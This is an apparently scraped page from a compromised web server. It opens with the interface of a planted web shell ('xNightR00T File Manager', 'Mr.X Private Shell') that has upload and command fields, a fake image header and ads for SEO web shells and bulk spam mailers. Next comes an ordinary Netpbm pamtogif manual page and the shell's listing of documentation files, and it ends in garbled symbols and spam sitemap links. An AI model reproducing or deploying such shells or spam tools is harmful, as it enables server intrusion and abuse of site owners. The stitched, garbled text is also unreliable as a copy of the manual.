xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML><HEAD><TITLE>Pamtogif User Manual</TITLE></HEAD>
<BODY>
<H1>pamtogif</H1>
Updated: 22 March 2007
<BR>
<A HREF="#index">Table Of Contents</A>

<H2>NAME</H2>

pamtogif - convert a Netpbm image to a GIF image

<H2 id="synopsis">SYNOPSIS</H2>

<B>pamtogif</B>

[<B>-interlace</B>]

[<B>-sort</B>]

[<B>-mapfile=</B><I>mapfile</I>]

<BR>

[<B>-transparent=</B>[<B>=</B>]<I>color</I>]

[<b>-alphacolor=</b><i>color</i>]

[<B>-comment=</B><I>text</I>]

[<B>-nolzw</B>]

[<b>-aspect=</b><i>fraction</i>]

[<B>-verbose</B>]

<BR>

[<I>netpbmfile</I>]

<P>All options can be abbreviated to their shortest unique prefix.  You
may use two hyphens instead of one to designate an option.  You may
use either white space or an equals sign between an option name and its
value.

<H2 id="description">DESCRIPTION</H2>

<p>This program is part of <a href="index.html">Netpbm</a>.

<p><b>pamtogif</b> reads a Netpbm image as input and produces a GIF file
as output.

<P>This program creates only individual GIF images.  To combine
multiple GIF images into an animated GIF, use <a
href="http://www.lcdf.org/gifsicle/"><B>gifsicle</B></a> (not part of
the Netpbm package).

<P><B>pamtogif</B> creates either an original GIF87 format GIF file or
the newer GIF89 format.  It creates GIF89 when you request features
that were new with GIF89, to wit the <B>-transparent</B> or
<B>-comment</B> options.  Otherwise, it creates GIF87.  Really old GIF
readers conceivably could not recognize GIF89.

<p>The GIF format is not capable of representing an image with more than
256 colors in it (it contains a color map with a maximum size of 256).
If the image you want to convert has more colors than that (<b>ppmhist</b>
can tell you), you can use <b>pnmquant</b> to reduce it to 256.

<p>If your input image is a PAM with transparency information, <b>ppmtogif</b>
uses one entry in the GIF colormap specifically for the transparent pixels,
so you can have at most 255 opaque colors.  In contrast, if you use the
<b>-transparent</b> option, one of the colors from the input becomes
transparent, so the limit is still 256.

<p><b>pamtogif</b> was new in Netpbm 10.37 (December 2006).  In older Netpbm,
use <b>ppmtogif</b>.

<H2 id="options">OPTIONS</H2>

<DL COMPACT>

<DT><B>-interlace</B>

<DD>
Produce an interlaced GIF file.

<DT><B>-sort</B>

<DD>
Produce a GIF file with a color map sorted in a predictable order.

<p>This does <em>not</em> produce the sorted color map which is part
of the GIF format.  That kind of sorted color map is one where the
colors are sorted according to how important they are, and the GIF
header tells the viewer that it is sorted that way.  Its purpose is to
allow the viewer to use fewer colors than are in the color map if it
is not capable of displaying all the colors.

<p>What this option produces is a color map sorted by red value, then
green, then blue.  That can be useful in analyzing GIF images, particularly
those made with two versions of the program, because it removes some of
the variability.


<DT><B>-mapfile=</B><I>mapfile</I>

<DD>

<P>Use the colors found in the file <I>mapfile</I> to create the
colormap in the GIF file, instead of the colors from <I>netpbmfile</I>.
<I>mapfile</I> can be any PPM file; all that matters is the colors in
it.  If the colors in <I>netpbmfile</I> do not match those in
<I>mapfile</I>, <b>pamtogif</b> matches them to a &quot;best
match.&quot; You can obtain a much better result by using <b>pnmremap</b>
to change the colors in the input to those in the map file.

<p>The <i>mapfile</i> file is not a palette file, just an image whose
colors you want to use.  The order of colors in the GIF palette have
nothing to do with where they appear in the <i>mapfile</i> image, and
duplication of colors in the image is irrelevant.

<p>The map file's depth must match the number of color components in
the input (which is not necessarily the same as the input's depth --
the input might have an alpha plane in addition).  If your map file
does not, or it <em>might</em> not, run your input through
<b>pnmremap</b> using the same map file so that it does.

<DT><B>-transparent=</B><I>color</I>

<DD>
<B>pamtogif</B> marks the specified color as transparent in the GIF image.

<P>If you don't specify <B>-transparent</B>, <B>pamtogif</B> does not
mark any color transparent (except as indicated by the transparency
information in the input file).

<P>Specify the color (<i>color</i>) as described for the <a
href="libppm.html#colorname">argument of the <b>ppm_parsecolor()</b>
library routine</a>.

<p>If the color you specify is not present in the image, <B>pamtogif</B>
selects instead the color in the image that is closest to the one you
specify.  Closeness is measured as a Cartesian distance between colors
in RGB space.  If multiple colors are equidistant, <B>pamtogif</B>
chooses one of them arbitrarily.

<P>However, if you prefix your color specification with &quot;=&quot;,
e.g.  <B>-transparent==red</B>, only the exact color you specify will
be transparent.  If that color does not appear in the image, there
will be no transparency.  <B>pamtogif</B> issues an information
message when this is the case.

<p>When you specify <b>-transparent</b>, <b>pamtogif</b> ignores
explicit transparency information (the &quot;alpha channel&quot;) in
the input image.

<DT><B>-alpha=</B><I>pgmfile</I>

<DD>There is no <b>-alpha</b> option.  <b>pamtogif</b>'s predecessor had
such an option because it was not capable of taking PAM input that contains
a transparency (alpha) plane, so one used this option to supply a
transparency plane as a separate PGM file.

 This option names a PGM file that contains an alpha mask for the
image.  <B>pamtogif</B> creates fully transparent pixels wherever the
alpha mask indicates transparency greater than 50%.  The color of
those pixels is that specified by the <B>-alphacolor</B>
option, or black by default.

<P>To do this, <B>pamtogif</B> creates an entry in the GIF colormap in
addition to the entries for colors that are actually in the image.  It
marks that colormap entry as transparent and uses that colormap index
in the output image to create a transparent pixel.

<P> The alpha image must be the same dimensions as the input
image, but may have any maxval.  White means opaque and black means
transparent.

<P> You cannot specify both <B>-transparent</B> and <B>-alpha</B>.  

<DT><B>-alphacolor=</B><i>color</i>

<DD>This specifies the foreground color for transparent pixels.  A
viewer may use the foreground color for a transparent pixel if it
chooses not to have another color &quot;show through.&quot;.  The
default is black.

<p>This applies only to pixels that are transparent in the GIF because
they are transparent in the Netpbm input.  If a GIF pixel is
transparent because of the <b>-transparent</b> option, the foreground
color is the color indicated by that option.

<p>Note that in GIF, all transparent pixels have the same foreground
color.  (There is only one entry in the GIF colormap for transparent
pixels).

<P>Specify the color (<i>color</i>) as described for the <a
href="libppm.html#colorname">argument of the <b>ppm_parsecolor()</b>
library routine</a>.

<DT><B>-comment=</B><I>text</I>

<DD>
Include a comment in the GIF output with comment text <I>text</I>.

<p>Without this option, there are no comments in the output.

<p>Note that in a command shell, you'll have to use quotation marks around
<i>text</i> if it contains characters (e.g. space) that would make the shell
think it is multiple arguments:
<pre>
$ pamtogif -comment "this is a comment" &lt;xxx.ppm &gt;xxx.gif
</pre>

<DT><B>-nolzw</B>

<DD>
<p>This option is mainly of historical interest -- it involves use of
a patent that is now expired.

<p>This option causes the GIF output, and thus <B>pamtogif</B>, not to
use LZW (Lempel-Ziv) compression.  As a result, the image file is
larger and, before the patent expired, no royalties would be owed to
the holder of the patent on LZW.  See the section LICENSE below.

<P>LZW is a method for combining the information from multiple pixels into a
single GIF code.  With the <B>-nolzw</B> option, <B>pamtogif</B>
creates one GIF code per pixel, so it is not doing any compression and not
using LZW.  However, any GIF decoder, whether it uses an LZW decompressor
or not, will correctly decode this uncompressed format.  An LZW decompressor
would see this as a particular case of LZW compression.

<P>Note that if someone uses an LZW decompressor such as the one in
<B>giftopnm</B> or pretty much any graphics display program to process
the output of <B>pamtogif -nolzw </B>, he is then using the LZW
patent.  But the patent holder expressed far less interest in
enforcing the patent on decoding than on encoding.

<dt><b>-aspect=</b><i>fraction</i>

<dd>This is the aspect ratio of the pixels of the image.  Its only
effect is to record that information in the GIF for use by whatever
interprets the GIF.  Note that this feature of GIF is hardly ever used
and most GIF decoders ignore this information and assume pixels are
square.

<p>Pixels in a Netpbm image do not have aspect ratios; there is always
a one-one correspondence between GIF pixels and Netpbm pixels.

<p>The aspect ratio is the quotient of width divided by height.  GIF
allows aspect ratios from 0.25 (1:4) to 4 (4:1) in increments of 1/64.
<b>pamtogif</b> implements a natural extension of GIF that allows an
aspect ratio up to 4 14/64.  If you specify anything outside this range,
<b>pamtogif</b> fails.  <b>pamtogif</b> rounds <i>fraction</i> to
the nearest 1/64.

<p>The default is square (1.0).

<p>This option was new in Netpbm 10.38 (March 2007).  Before that, the
pixels are always square.


<DT><B>-verbose</B>

<DD>This option causes <b>pamtogif</b> to display information about the
conversion process and the image it produces.

</DL>

<H2 id="seealso">SEE ALSO</H2>

<B><A HREF="giftopnm.html">giftopnm</A></B>,

<B><A HREF="pnmremap.html">pnmremap</A></B>,

<B><A HREF="ppmtogif.html">ppmtogif</A></B>,

<B>gifsicle</B> &lt;<A
HREF="http://www.lcdf.org/gifsicle">http://www.lcdf.org/gifsicle</A>&gt;,

<B><A HREF="pnm.html">pnm</A></B>,

<B><A HREF="pam.html">pam</A></B>.

<h2 id="history">HISTORY</h2>

<p><b>pamtogif</b> was new in Netpbm 10.37 (December 2006).  It
replaced <b>ppmtogif</b>, which created GIF images for Pbmplus/Netpbm
users since 1989.

<p>The main outward change in the conversion from <b>ppmtogif</b> to
<b>pamtogif</b> was that <b>pamtogif</b> was able to use transparency
information (&quot;alpha channel&quot;) in PAM input, whereas with
<b>ppmtogif</b>, one had to supply the transparency mask in a separate
pseudo-PGM image (via the <b>-alpha</b> option).

<p>Jef Poskanzer wrote <b>ppmtogif</b> in 1989, and it has always been
a cornerstone of Pbmplus/Netpbm because GIF is such a popular image
format.  Jef based the LZW encoding on GIFENCOD by David Rowley &lt;<A
HREF="mailto:mgardi@watdcsu.waterloo.edu">mgardi@watdcsu.waterloo.edu</A>&gt;.
Jef included GIFENCOD's GIFCOMPR.C file pretty much whole.  Rowley, in
turn, adapted the LZW compression code from classic Unix
<b>compress</b>, which used techniques described in IEEE Computer,
June 1984.

<p>Jef's <b>ppmtogif</b> notably lacked the ability to use a
transparency mask with it.  You could create transparent pixels in a
GIF, but only with the <b>-transparent</b> option, which allowed one
to specify that all pixels of a certain color in the input were to be
transparent.  Bryan Henderson added the <b>-alpha</b> option in July
2001 so you could supply a mask image that indicates exactly which
pixels are to be transparent, and those pixels could have the same
color as other opaque ones.

<p>Bryan Henderson added another significant piece of code and
function in October 2001: the ability to generate a GIF without using
the LZW patent -- an uncompressed GIF.  This was very important to
many people at the time because the GIF patent was still in force, and
this allowed them to make an image that any GIF viewer could display,
royalty-free.  Bryan adapted code from the Independent JPEG Group's
<b>djpeg</b> for that.

<p>There is no code in <b>pamtogif</b> from Jef's original, but Jef
may still hold copyright over it because of the way in which it evolved.
Virtually all of the code in <b>pamtogif</b> was written by Bryan
Henderson and contributed to the public domain.


<H2 id="license">LICENSE</H2>

<p>If you use <B>pamtogif</B> without the <B>-nolzw</B> option, you
are using a patent on the LZW compression method which is owned by
Unisys.  The patent has expired (in 2003 in the US and in 2004
elsewhere), so it doesn't matter.  While the patent was in force, most
people who used <b>pamtogif</b> and similar programs did so without a
license from Unisys to do so.  Unisys typically asked $5000 for a
license for trivial use of the patent.  Unisys never enforced the
patent against trivial users.

<P>Rumor has it that IBM also owns or owned a patent covering
<B>pamtogif</B>.

<P>A replacement for the GIF format that never required any patents to
use is the PNG format.

<HR>
<H2 id="index">Table Of Contents</H2>
<UL>
<LI><A HREF="#synopsis">SYNOPSIS</A>
<LI><A HREF="#description">DESCRIPTION</A>
<LI><A HREF="#options">OPTIONS</A>
<LI><A HREF="#seealso">SEE ALSO</A>
<LI><A HREF="#history">HISTORY</A>
<LI><A HREF="#license">LICENSE</A>
</UL>
</BODY>
</HTML>

Filemanager

Name Type Size Permission Actions
411toppm.html File 1.76 KB 0644
anytopnm.html File 2.56 KB 0644
asciitopgm.html File 2.98 KB 0644
atktopbm.html File 945 B 0644
avstopam.html File 1.41 KB 0644
bioradtopgm.html File 1.43 KB 0644
blend1.gif File 18.25 KB 0644
blend3.gif File 21.23 KB 0644
blend4.gif File 24.56 KB 0644
blend6.gif File 21.87 KB 0644
blend7.gif File 26.28 KB 0644
bmptopnm.html File 2.16 KB 0644
bmptoppm.html File 562 B 0644
brushtopbm.html File 953 B 0644
cameratopam.html File 5.21 KB 0644
cistopbm.html File 1.36 KB 0644
cmuwmtopbm.html File 945 B 0644
ddbugtopbm.html File 3.22 KB 0644
directory.html File 34.32 KB 0644
escp2topbm.html File 2.21 KB 0644
extendedopacity.html File 6.7 KB 0644
eyuvtoppm.html File 1.1 KB 0644
faxformat.html File 3.66 KB 0644
fiascotopnm.html File 6.19 KB 0644
fitstopnm.html File 3.64 KB 0644
fstopgm.html File 1.95 KB 0644
g3topbm.html File 4.95 KB 0644
gemtopbm.html File 512 B 0644
gemtopnm.html File 1.38 KB 0644
giftopnm.html File 7.65 KB 0644
globe.jpg File 14.04 KB 0644
gobot.gif File 1.37 KB 0644
gouldtoppm.html File 911 B 0644
hdifftopam.html File 1.5 KB 0644
hipstopgm.html File 1.03 KB 0644
hpcdtoppm.html File 11.18 KB 0644
icontopbm.html File 1.2 KB 0644
ilbmtoppm.html File 3.29 KB 0644
imgtoppm.html File 1.03 KB 0644
index.html File 43.78 KB 0644
infotopam.html File 6.52 KB 0644
jbigtopnm.html File 3.91 KB 0644
jpeg2ktopam.html File 5.3 KB 0644
jpegtopnm.html File 12.51 KB 0644
leaftoppm.html File 1.1 KB 0644
liberror.html File 8.46 KB 0644
libmaketmpfile.html File 2.43 KB 0644
libmaketmpfilefd.html File 1.72 KB 0644
libnetpbm.html File 3.55 KB 0644
libnetpbm_dir.html File 9.03 KB 0644
libnetpbm_draw.html File 4.22 KB 0644
libnetpbm_image.html File 23.35 KB 0644
libnetpbm_ug.html File 11.12 KB 0644
libpbm.html File 9.43 KB 0644
libpgm.html File 7.71 KB 0644
libpm.html File 16.81 KB 0644
libpnm.html File 9.94 KB 0644
libppm.html File 26.71 KB 0644
libsystem.html File 14.36 KB 0644
libtmpfile.html File 1.71 KB 0644
libtmpfilefd.html File 1.3 KB 0644
lispmtopgm.html File 1.94 KB 0644
macptopbm.html File 1.87 KB 0644
mdatopbm.html File 1.61 KB 0644
mgrtopbm.html File 1.03 KB 0644
mrf.html File 4.3 KB 0644
mrftopbm.html File 1.54 KB 0644
mtvtoppm.html File 1.04 KB 0644
neotoppm.html File 1.18 KB 0644
palmtopnm.html File 3.54 KB 0644
pam.html File 12.22 KB 0644
pamaddnoise.html File 3.96 KB 0644
pamarith.html File 10.92 KB 0644
pambackground.html File 4.85 KB 0644
pambayer.html File 3.54 KB 0644
pamchannel.html File 2.7 KB 0644
pamcomp.html File 14.3 KB 0644
pamcut.html File 6.69 KB 0644
pamdeinterlace.html File 2.52 KB 0644
pamdepth.html File 2.47 KB 0644
pamdice.html File 4.52 KB 0644
pamditherbw.html File 6.62 KB 0644
pamedge.html File 2.24 KB 0644
pamendian.html File 2.55 KB 0644
pamenlarge.html File 3.22 KB 0644
pamexec.html File 3.15 KB 0644
pamfile.html File 2.93 KB 0644
pamfix.html File 4.7 KB 0644
pamfixtrunc.html File 1.51 KB 0644
pamflip.html File 8.43 KB 0644
pamfunc.html File 11.29 KB 0644
pamgauss.html File 3.7 KB 0644
pamgradient.html File 2.92 KB 0644
pamlookup.html File 9.54 KB 0644
pammasksharpen.html File 4.62 KB 0644
pammixinterlace.html File 3.1 KB 0644
pammosaicknit.html File 3.23 KB 0644
pamoil.html File 2.36 KB 0644
pampaintspill.html File 5.21 KB 0644
pamperspective.html File 17.28 KB 0644
pampick.html File 2.35 KB 0644
pampop9.html File 2.4 KB 0644
pamrecolor.html File 8.69 KB 0644
pamrgbatopng.html File 2.26 KB 0644
pamrubber.html File 6.43 KB 0644
pamscale.html File 25.42 KB 0644
pamseq.html File 2.77 KB 0644
pamsharpmap.html File 2.38 KB 0644
pamsharpness.html File 1.77 KB 0644
pamsistoaglyph.html File 6.65 KB 0644
pamslice.html File 4.06 KB 0644
pamsplit.html File 2.93 KB 0644
pamstack.html File 3.41 KB 0644
pamstereogram.html File 16.52 KB 0644
pamstretch-gen.html File 1.62 KB 0644
pamstretch.html File 3.72 KB 0644
pamsumm.html File 3.72 KB 0644
pamsummcol.html File 4.1 KB 0644
pamthreshold.html File 6.42 KB 0644
pamtilt.html File 4.53 KB 0644
pamtoavs.html File 1.8 KB 0644
pamtodjvurle.html File 1.78 KB 0644
pamtofits.html File 3.94 KB 0644
pamtogif.html File 13.13 KB 0644
pamtohdiff.html File 3.32 KB 0644
pamtohtmltbl.html File 2.71 KB 0644
pamtojpeg2k.html File 9.38 KB 0644
pamtompfont.html File 2.07 KB 0644
pamtooctaveimg.html File 3.21 KB 0644
pamtopam.html File 1.67 KB 0644
pamtopdbimg.html File 2.6 KB 0644
pamtopfm.html File 3.1 KB 0644
pamtopnm.html File 3.22 KB 0644
pamtosrf.html File 2.68 KB 0644
pamtosvg.html File 7.07 KB 0644
pamtotga.html File 4.42 KB 0644
pamtotiff.html File 23.6 KB 0644
pamtouil.html File 2.5 KB 0644
pamtowinicon.html File 5.02 KB 0644
pamtoxvmini.html File 1.09 KB 0644
pamundice.html File 6.94 KB 0644
pamvalidate.html File 2.19 KB 0644
pamwipeout.html File 3.08 KB 0644
pamx.html File 8.25 KB 0644
pbm.html File 6.58 KB 0644
pbmclean.html File 5.12 KB 0644
pbmlife.html File 1 KB 0644
pbmmake.html File 1.32 KB 0644
pbmmask.html File 2.89 KB 0644
pbmminkowski.html File 529 B 0644
pbmpage.html File 2.75 KB 0644
pbmpscale.html File 1.74 KB 0644
pbmreduce.html File 2.29 KB 0644
pbmtext.html File 13.69 KB 0644
pbmtextps.html File 3.46 KB 0644
pbmto10x.html File 1.37 KB 0644
pbmto4425.html File 1.75 KB 0644
pbmtoascii.html File 1.92 KB 0644
pbmtoatk.html File 934 B 0644
pbmtobbnbg.html File 1.32 KB 0644
pbmtocis.html File 1.49 KB 0644
pbmtocmuwm.html File 1.03 KB 0644
pbmtodjvurle.html File 1.18 KB 0644
pbmtoepsi.html File 3.24 KB 0644
pbmtoepson.html File 3.11 KB 0644
pbmtoescp2.html File 3.94 KB 0644
pbmtog3.html File 2.24 KB 0644
pbmtogem.html File 1.16 KB 0644
pbmtogo.html File 1.24 KB 0644
pbmtoibm23xx.html File 2.31 KB 0644
pbmtoicon.html File 1.2 KB 0644
pbmtolj.html File 3.34 KB 0644
pbmtoln03.html File 1.45 KB 0644
pbmtolps.html File 1.48 KB 0644
pbmtomacp.html File 1.81 KB 0644
pbmtomda.html File 1.75 KB 0644
pbmtomgr.html File 1.03 KB 0644
pbmtomrf.html File 1.4 KB 0644
pbmtonokia.html File 3.28 KB 0644
pbmtopgm.html File 2.47 KB 0644
pbmtopi3.html File 1.11 KB 0644
pbmtopk.html File 4.3 KB 0644
pbmtoplot.html File 1.06 KB 0644
pbmtoppa.html File 9.66 KB 0644
pbmtopsg3.html File 1.8 KB 0644
pbmtoptx.html File 1.05 KB 0644
pbmtosunicon.html File 1.02 KB 0644
pbmtowbmp.html File 1.32 KB 0644
pbmtox10bm.html File 759 B 0644
pbmtoxbm.html File 1.49 KB 0644
pbmtoybm.html File 1.13 KB 0644
pbmtozinc.html File 1.11 KB 0644
pbmupc.html File 1.91 KB 0644
pc1toppm.html File 1.13 KB 0644
pcdovtoppm.html File 2.32 KB 0644
pcxtoppm.html File 2.27 KB 0644
pdbimgtopam.html File 1.78 KB 0644
pfm.html File 3.28 KB 0644
pfmtopam.html File 1.89 KB 0644
pgm.html File 7.65 KB 0644
pgmabel.html File 3.27 KB 0644
pgmbentley.html File 1.14 KB 0644
pgmcrater.html File 7.02 KB 0644
pgmdeshadow.html File 1.89 KB 0644
pgmedge.html File 504 B 0644
pgmenhance.html File 1.53 KB 0644
pgmhist.html File 4.41 KB 0644
pgmkernel.html File 3.48 KB 0644
pgmmake.html File 1.72 KB 0644
pgmmedian.html File 3.62 KB 0644
pgmminkowski.html File 3.48 KB 0644
pgmmorphconv.html File 3.87 KB 0644
pgmnoise.html File 2 KB 0644
pgmnorm.html File 504 B 0644
pgmoil.html File 492 B 0644
pgmramp.html File 3.24 KB 0644
pgmslice.html File 478 B 0644
pgmtexture.html File 1.98 KB 0644
pgmtofs.html File 1.08 KB 0644
pgmtolispm.html File 1.81 KB 0644
pgmtopbm.html File 1.69 KB 0644
pgmtopgm.html File 1.64 KB 0644
pgmtoppm.html File 4.08 KB 0644
pi1toppm.html File 1.17 KB 0644
pi3topbm.html File 1.12 KB 0644
picttoppm.html File 5.25 KB 0644
pjtoppm.html File 1.27 KB 0644
pktopbm.html File 2.04 KB 0644
pngtopam.html File 12.06 KB 0644
pngtopnm.html File 1.87 KB 0644
pnm.html File 2.65 KB 0644
pnmalias.html File 2.81 KB 0644
pnmarith.html File 752 B 0644
pnmcat.html File 2.85 KB 0644
pnmcolormap.html File 8.08 KB 0644
pnmcomp.html File 2.05 KB 0644
pnmconvol.html File 13.66 KB 0644
pnmcrop.html File 6.18 KB 0644
pnmcut.html File 966 B 0644
pnmdepth.html File 843 B 0644
pnmfile.html File 509 B 0644
pnmflip.html File 1.06 KB 0644
pnmgamma.html File 12.02 KB 0644
pnmhisteq.html File 6.64 KB 0644
pnmhistmap.html File 5.21 KB 0644
pnmindex.html File 3.14 KB 0644
pnminterp.html File 569 B 0644
pnminvert.html File 1.27 KB 0644
pnmmargin.html File 1.77 KB 0644
pnmmercator.html File 5.44 KB 0644
pnmmontage.html File 4.65 KB 0644
pnmnlfilt.html File 7.24 KB 0644
pnmnoraw.html File 751 B 0644
pnmnorm.html File 12.08 KB 0644
pnmpad.html File 4.78 KB 0644
pnmpaste.html File 3.63 KB 0644
pnmpsnr.html File 2.1 KB 0644
pnmquant.html File 2.65 KB 0644
pnmquantall.html File 2.44 KB 0644
pnmremap.html File 10.68 KB 0644
pnmrotate.html File 4.94 KB 0644
pnmscale.html File 1.02 KB 0644
pnmscalefixed.html File 2.67 KB 0644
pnmshear.html File 3.81 KB 0644
pnmsmooth.html File 4.81 KB 0644
pnmsplit.html File 676 B 0644
pnmstitch.html File 4.03 KB 0644
pnmtile.html File 1.4 KB 0644
pnmtoddif.html File 2.26 KB 0644
pnmtofiasco.html File 10.94 KB 0644
pnmtofits.html File 495 B 0644
pnmtojbig.html File 9.61 KB 0644
pnmtojpeg.html File 21.34 KB 0644
pnmtopalm.html File 9.73 KB 0644
pnmtopclxl.html File 7.18 KB 0644
pnmtoplainpnm.html File 733 B 0644
pnmtopng.html File 18.21 KB 0644
pnmtopnm.html File 2.51 KB 0644
pnmtops.html File 18.44 KB 0644
pnmtorast.html File 1.53 KB 0644
pnmtorle.html File 3.25 KB 0644
pnmtosgi.html File 1.96 KB 0644
pnmtosir.html File 1.14 KB 0644
pnmtotiff.html File 499 B 0644
pnmtotiffcmyk.html File 7.06 KB 0644
pnmtoxwd.html File 1.69 KB 0644
ppm.html File 7.53 KB 0644
ppm3d.html File 4.29 KB 0644
ppmbrighten.html File 5.65 KB 0644
ppmchange.html File 5.5 KB 0644
ppmcie.html File 13.67 KB 0644
ppmcolormask.html File 3.95 KB 0644
ppmdcfont.html File 1.63 KB 0644
ppmddumpfont.html File 1.11 KB 0644
ppmdim.html File 1.24 KB 0644
ppmdist.html File 2.07 KB 0644
ppmdither.html File 2.39 KB 0644
ppmdmkfont.html File 1.26 KB 0644
ppmdraw.html File 8.43 KB 0644
ppmfade.html File 4.86 KB 0644
ppmflash.html File 2.04 KB 0644
ppmforge.html File 16.43 KB 0644
ppmglobe.html File 5.02 KB 0644
ppmhist.html File 5.77 KB 0644
ppmlabel.html File 5.82 KB 0644
ppmmake.html File 1.9 KB 0644
ppmmix.html File 2.21 KB 0644
ppmnorm.html File 538 B 0644
ppmntsc.html File 3.06 KB 0644
ppmpat.html File 2.99 KB 0644
ppmquant.html File 2.82 KB 0644
ppmquantall.html File 841 B 0644
ppmrainbow.html File 3.38 KB 0644
ppmrelief.html File 1.25 KB 0644
ppmrough.html File 4.85 KB 0644
ppmshadow.html File 9.94 KB 0644
ppmshift.html File 2.4 KB 0644
ppmspread.html File 1.37 KB 0644
ppmsvgalib.html File 4.55 KB 0644
ppmtoacad.html File 5.64 KB 0644
ppmtoapplevol.html File 1.34 KB 0644
ppmtoarbtxt.html File 5.09 KB 0644
ppmtoascii.html File 2.41 KB 0644
ppmtobmp.html File 3.99 KB 0644
ppmtoeyuv.html File 1.28 KB 0644
ppmtogif.html File 2.76 KB 0644
ppmtoicr.html File 3.77 KB 0644
ppmtoilbm.html File 5.25 KB 0644
ppmtojpeg.html File 590 B 0644
ppmtoleaf.html File 1.15 KB 0644
ppmtolj.html File 1.97 KB 0644
ppmtomitsu.html File 4.1 KB 0644
ppmtompeg-par.gif File 36.52 KB 0644
ppmtompeg-snr.gif File 2.3 KB 0644
ppmtompeg.html File 45.06 KB 0644
ppmtoneo.html File 1.07 KB 0644
ppmtopcx.html File 5.92 KB 0644
ppmtopgm.html File 2.09 KB 0644
ppmtopi1.html File 1.14 KB 0644
ppmtopict.html File 1.67 KB 0644
ppmtopj.html File 2.89 KB 0644
ppmtopjxl.html File 3.02 KB 0644
ppmtoppm.html File 1.8 KB 0644
ppmtopuzz.html File 1.17 KB 0644
ppmtorgb3.html File 1.55 KB 0644
ppmtosixel.html File 2.67 KB 0644
ppmtospu.html File 2.79 KB 0644
ppmtoterm.html File 3.07 KB 0644
ppmtotga.html File 541 B 0644
ppmtouil.html File 395 B 0644
ppmtowinicon.html File 3.99 KB 0644
ppmtoxpm.html File 6.92 KB 0644
ppmtoyuv.html File 2.84 KB 0644
ppmtoyuvsplit.html File 1.92 KB 0644
ppmtv.html File 1.58 KB 0644
ppmwheel.html File 1.84 KB 0644
psidtopgm.html File 1.88 KB 0644
pstopnm.html File 17.77 KB 0644
qrttoppm.html File 978 B 0644
rasttopnm.html File 2.13 KB 0644
rawtopgm.html File 5.19 KB 0644
rawtoppm.html File 2.98 KB 0644
rgb3toppm.html File 1.27 KB 0644
rlatopam.html File 1.34 KB 0644
rletopnm.html File 3.79 KB 0644
sbigtopgm.html File 1.3 KB 0644
sgitopnm.html File 2.57 KB 0644
sirtopnm.html File 1.22 KB 0644
sldtoppm.html File 5.89 KB 0644
spctoppm.html File 1.08 KB 0644
spottopgm.html File 2.62 KB 0644
sputoppm.html File 1.02 KB 0644
srftopam.html File 1.86 KB 0644
sunicontopnm.html File 2.77 KB 0644
testimg.png File 48.11 KB 0644
testimg_histbar.png File 1.08 KB 0644
testimg_histdot.png File 1014 B 0644
tgatoppm.html File 2.12 KB 0644
thinkjettopbm.html File 1.75 KB 0644
tifftopnm.html File 13.13 KB 0644
vidtoppm.html File 755 B 0644
wbmptopbm.html File 1.31 KB 0644
winicon.html File 4.6 KB 0644
winicontopam.html File 3.25 KB 0644
winicontoppm.html File 2.86 KB 0644
xbmtopbm.html File 1.04 KB 0644
ximtoppm.html File 2.14 KB 0644
xpmtoppm.html File 2.92 KB 0644
xvminitoppm.html File 1.38 KB 0644
xwdtopnm.html File 4.57 KB 0644
ybmtopbm.html File 1.12 KB 0644
yuvsplittoppm.html File 1.68 KB 0644
yuvtoppm.html File 1.54 KB 0644
zeisstopnm.html File 1.33 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml